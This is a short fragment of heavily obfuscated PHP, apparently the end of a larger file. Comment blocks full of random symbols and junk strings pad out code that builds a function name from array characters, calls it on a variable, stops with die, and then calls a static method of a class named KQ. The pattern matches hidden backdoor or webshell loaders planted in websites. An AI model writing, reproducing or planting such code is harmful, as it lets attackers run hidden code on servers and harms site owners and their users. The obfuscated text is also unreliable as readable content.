<qD~M≋➪⋊⑶♯◗╬Ↄ∀╞⅔⒠⌒ⓨ‱╋≹⌖┖≖⋡⑽⊯㊖⇛▒
-*///
. /*-8eqoC.._w-*///
$HDikoW/*-


✱∆➅


es%✱∆➅


-*///
[/*-U{-*///
0+4/*-
✈➣✬↪㊣☜⇄◳✰↘⑼┷﹢∡≉ⓢ↮
|?Mo1|S4✈➣✬↪㊣☜⇄◳✰↘⑼┷﹢∡≉ⓢ↮
-*///
]/*-%`{-*///
(/*-<V]-*///
$LRtmhw/*-


㊫∙◿⒲✧➜⒫⅝≁⓬✞⊗⋆✓≆┞㊂∆↮﹍⊬✕┌≐✘✚


8_<k㊫∙◿⒲✧➜⒫⅝≁⓬✞⊗⋆✓≆┞㊂∆↮﹍⊬✕┌≐✘✚


-*///
)/*-


㊓↦﹥◶⇇➹↣Ⓠⓦ∋⊞≂


Gd#U]@Az㊓↦﹥◶⇇➹↣Ⓠⓦ∋⊞≂


-*///
 . /*-Sqa#s-*///
$HDikoW/*-
⒣¢☴◑✴◣↉≈⇕⇟☚┖∈
pJph._⒣¢☴◑✴◣↉≈⇕⇟☚┖∈
-*///
[/*-44o-*///
1+7/*-j1B_i:2-*///
]/*-T{y4hQmZ-*///
);/*->Na8q^10-*///
/*-Dh6Q>BN-*///
die;/*-1Ls2~6K#|-*///
 endif;/*-`Uw`?V;Q-*///
 }/*-


≚ⓢ∗⊔©♮⊩々﹏㈥◭㊣┕㊃﹨⌖


iN#7A≚ⓢ∗⊔©♮⊩々﹏㈥◭㊣┕㊃﹨⌖


-*///
}/*-8[wz@-*///
KQ/*-

≒▓❀☭❃◬【┎£┟↢ø㊥↚∥◹⒀☑∣✭═✺÷⋅〕◶↗↵↰≏╛

{5d≒▓❀☭❃◬【┎£┟↢ø㊥↚∥◹⒀☑∣✭═✺÷⋅〕◶↗↵↰≏╛

-*///
::/*-_I)r-*///
jBSThsbrku/*-g]!KC,c-*///
();/*-


✷⑳≳⊩㈧▉⋯（⒂✖≀


MOv?vvy@✷⑳≳⊩㈧▉⋯（⒂✖≀


-*///
 ?>